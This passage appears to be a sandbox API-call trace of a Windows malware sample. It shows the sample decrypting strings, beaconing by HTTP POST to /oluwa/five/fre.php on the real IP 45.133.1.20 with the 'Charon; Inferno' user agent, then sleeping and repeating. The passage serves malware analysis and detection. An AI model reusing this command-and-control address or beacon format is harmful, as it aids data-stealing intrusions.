(dwMilliseconds=0xea60) [0279.123] GetProcessHeap () returned 0x6a0000 [0279.123] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0279.124] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0279.124] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0279.131] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0279.132] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf168) returned 1 [0279.141] GetProcessHeap () returned 0x6a0000 [0279.141] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0279.142] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0279.143] CryptImportKey (in: hProv=0x6bf168, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0279.144] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0279.144] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0279.227] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0279.228] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0279.228] GetProcessHeap () returned 0x6a0000 [0279.228] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0279.229] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0279.229] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0279.230] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0279.230] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0279.231] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0279.231] CryptReleaseContext (hProv=0x6bf168, dwFlags=0x0) returned 1 [0279.231] GetProcessHeap () returned 0x6a0000 [0279.232] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0279.232] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0279.233] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0279.234] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0279.234] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0279.235] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0279.235] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0279.236] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0279.237] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0279.237] GetProcessHeap () returned 0x6a0000 [0279.237] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0279.237] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0279.237] GetProcessHeap () returned 0x6a0000 [0279.237] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0279.238] GetProcessHeap () returned 0x6a0000 [0279.238] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0279.238] GetProcessHeap () returned 0x6a0000 [0279.238] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0279.238] GetProcessHeap () returned 0x6a0000 [0279.238] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0279.239] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0279.239] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0279.249] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0279.249] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf0e0) returned 1 [0279.259] GetProcessHeap () returned 0x6a0000 [0279.259] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0279.260] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0279.261] CryptImportKey (in: hProv=0x6bf0e0, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0279.262] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0279.262] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0279.263] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0279.263] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0279.263] GetProcessHeap () returned 0x6a0000 [0279.264] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0279.265] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0279.266] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0279.267] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0279.267] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0279.268] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0279.268] CryptReleaseContext (hProv=0x6bf0e0, dwFlags=0x0) returned 1 [0279.268] GetProcessHeap () returned 0x6a0000 [0279.268] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0279.269] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0279.269] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0279.270] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0279.270] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0279.271] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0279.272] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0279.272] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0279.273] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0279.273] GetProcessHeap () returned 0x6a0000 [0279.273] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0279.273] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0279.273] GetProcessHeap () returned 0x6a0000 [0279.273] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6bab10 [0279.273] socket (af=2, type=1, protocol=6) returned 0xa18 [0279.273] connect (s=0xa18, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0279.306] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0279.306] GetProcessHeap () returned 0x6a0000 [0279.306] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf0e0 [0279.306] GetProcessHeap () returned 0x6a0000 [0279.306] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dcf38 [0279.307] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0279.308] wvsprintfA (in: param_1=0x6dcf38, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0279.308] GetProcessHeap () returned 0x6a0000 [0279.308] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6ba830 [0279.308] GetProcessHeap () returned 0x6a0000 [0279.309] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0279.309] GetProcessHeap () returned 0x6a0000 [0279.309] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4910 [0279.309] GetProcessHeap () returned 0x6a0000 [0279.309] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dcf38 [0279.310] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0279.311] wvsprintfA (in: param_1=0x6dcf38, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0279.311] GetProcessHeap () returned 0x6a0000 [0279.311] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0279.311] GetProcessHeap () returned 0x6a0000 [0279.311] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0279.312] send (s=0xa18, buf=0x6bd460*, len=242, flags=0) returned 242 [0279.312] send (s=0xa18, buf=0x6bb998*, len=159, flags=0) returned 159 [0279.312] GetProcessHeap () returned 0x6a0000 [0279.312] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6f28 [0279.312] recv (in: s=0xa18, buf=0x6c6f28, len=4048, flags=0 | out: buf=0x6c6f28*) returned 204 [0279.390] GetProcessHeap () returned 0x6a0000 [0279.391] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0279.391] GetProcessHeap () returned 0x6a0000 [0279.391] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0279.392] GetProcessHeap () returned 0x6a0000 [0279.392] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba830 | out: hHeap=0x6a0000) returned 1 [0279.392] GetProcessHeap () returned 0x6a0000 [0279.393] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf0e0 | out: hHeap=0x6a0000) returned 1 [0279.393] closesocket (s=0xa18) returned 0 [0279.393] GetProcessHeap () returned 0x6a0000 [0279.394] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bab10 | out: hHeap=0x6a0000) returned 1 [0279.394] GetProcessHeap () returned 0x6a0000 [0279.394] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0279.394] GetProcessHeap () returned 0x6a0000 [0279.395] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0279.395] GetProcessHeap () returned 0x6a0000 [0279.395] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0279.396] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6f28, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x17b0) returned 0xa18 [0279.398] Sleep (dwMilliseconds=0xea60) [0279.400] GetProcessHeap () returned 0x6a0000 [0279.400] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0279.400] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0279.401] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0279.409] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0279.409] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6befd0) returned 1 [0279.435] GetProcessHeap () returned 0x6a0000 [0279.435] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0279.436] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0279.437] CryptImportKey (in: hProv=0x6befd0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0279.437] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0279.438] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0279.439] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0279.439] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0279.439] GetProcessHeap () returned 0x6a0000 [0279.440] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0279.441] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0279.441] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0279.443] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0279.443] CryptDestroyKey (hKey=0x6ad020) returned 1 [0279.444] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0279.445] CryptReleaseContext (hProv=0x6befd0, dwFlags=0x0) returned 1 [0279.445] GetProcessHeap () returned 0x6a0000 [0279.445] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0279.446] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0279.446] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0279.447] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0279.448] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0279.448] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0279.453] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0279.454] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0279.455] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0279.455] GetProcessHeap () returned 0x6a0000 [0279.455] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0279.455] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0279.455] GetProcessHeap () returned 0x6a0000 [0279.456] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0279.456] GetProcessHeap () returned 0x6a0000 [0279.456] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0279.457] GetProcessHeap () returned 0x6a0000 [0279.457] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0279.457] GetProcessHeap () returned 0x6a0000 [0279.457] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0279.458] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0279.458] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0279.466] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0279.466] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6befd0) returned 1 [0279.481] GetProcessHeap () returned 0x6a0000 [0279.482] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0279.482] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0279.485] CryptImportKey (in: hProv=0x6befd0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0279.486] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0279.486] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0279.487] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0279.487] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0279.487] GetProcessHeap () returned 0x6a0000 [0279.488] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0279.489] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0279.489] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0279.490] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0279.490] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0279.492] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0279.492] CryptReleaseContext (hProv=0x6befd0, dwFlags=0x0) returned 1 [0279.492] GetProcessHeap () returned 0x6a0000 [0279.492] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0279.496] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0279.497] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0279.498] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0279.498] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0279.499] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0279.500] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0279.501] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0279.502] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0279.502] GetProcessHeap () returned 0x6a0000 [0279.502] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0279.502] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0279.502] GetProcessHeap () returned 0x6a0000 [0279.502] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baac0 [0279.502] socket (af=2, type=1, protocol=6) returned 0xa1c [0279.502] connect (s=0xa1c, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0279.525] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0279.525] GetProcessHeap () returned 0x6a0000 [0279.525] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bed28 [0279.525] GetProcessHeap () returned 0x6a0000 [0279.525] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dcf38 [0279.526] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0279.528] wvsprintfA (in: param_1=0x6dcf38, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0279.528] GetProcessHeap () returned 0x6a0000 [0279.528] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6ba770 [0279.528] GetProcessHeap () returned 0x6a0000 [0279.540] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0279.542] GetProcessHeap () returned 0x6a0000 [0279.542] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0279.557] GetProcessHeap () returned 0x6a0000 [0279.557] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dcf38 [0279.559] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0279.560] wvsprintfA (in: param_1=0x6dcf38, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0279.561] GetProcessHeap () returned 0x6a0000 [0279.561] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0279.561] GetProcessHeap () returned 0x6a0000 [0279.561] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0279.561] send (s=0xa1c, buf=0x6bd460*, len=242, flags=0) returned 242 [0279.562] send (s=0xa1c, buf=0x6bb998*, len=159, flags=0) returned 159 [0279.562] GetProcessHeap () returned 0x6a0000 [0279.562] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6f28 [0279.562] recv (in: s=0xa1c, buf=0x6c6f28, len=4048, flags=0 | out: buf=0x6c6f28*) returned 204 [0279.631] GetProcessHeap () returned 0x6a0000 [0279.631] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0279.632] GetProcessHeap () returned 0x6a0000 [0279.632] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0279.632] GetProcessHeap () returned 0x6a0000 [0279.633] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba770 | out: hHeap=0x6a0000) returned 1 [0279.633] GetProcessHeap () returned 0x6a0000 [0279.633] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bed28 | out: hHeap=0x6a0000) returned 1 [0279.633] closesocket (s=0xa1c) returned 0 [0279.634] GetProcessHeap () returned 0x6a0000 [0279.634] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baac0 | out: hHeap=0x6a0000) returned 1 [0279.634] GetProcessHeap () returned 0x6a0000 [0279.634] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0279.635] GetProcessHeap () returned 0x6a0000 [0279.635] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0279.635] GetProcessHeap () returned 0x6a0000 [0279.635] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0279.635] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6f28, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x17b8) returned 0xa1c [0279.637] Sleep (dwMilliseconds=0xea60) [0279.639] GetProcessHeap () returned 0x6a0000 [0279.639] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0279.640] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0279.641] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0279.646] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0279.647] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bec18) returned 1 [0279.654] GetProcessHeap () returned 0x6a0000 [0279.654] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0279.654] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 